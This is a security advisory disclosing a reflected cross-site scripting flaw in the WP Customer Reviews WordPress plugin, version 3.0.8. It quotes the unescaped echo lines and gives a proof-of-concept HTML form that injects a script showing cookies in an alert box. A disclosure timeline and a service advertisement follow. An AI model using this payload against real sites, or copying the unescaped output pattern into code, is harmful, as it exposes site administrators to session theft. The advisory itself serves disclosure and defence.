We recently discovered the WP Customer Reviews plugin had a reflected cross-site scripting (XSS) vulnerability. In version 3.0.8, and some prior versions, the file/include/admin/wp-customer-reviews-3-admin.php was echoing the value of the Support Code input without escaping it. That occurred on line 1151:

echo "<br />Running: <strong>{$this->p->wpcr3_debug_code}</strong><br /><br />";

and 1153:

print "<br /><strong>{$this->p->wpcr3_debug_code} DONE!</strong><br />";

Proof Of Concept

The following proof of concept page will cause any available cookies to shown in alert box. Major web browsers other than Firefox provide XSS filtering so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpcr3_options&tab=tools" method="post">
<input type="hidden" name="wpcr3_debug_code" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="wpcr3_confirm" value="YES" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• 4/4/2016 – Developer notified.
• 4/5/2016 – Version 3.0.9 released, which fixes vulnerability.

---

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.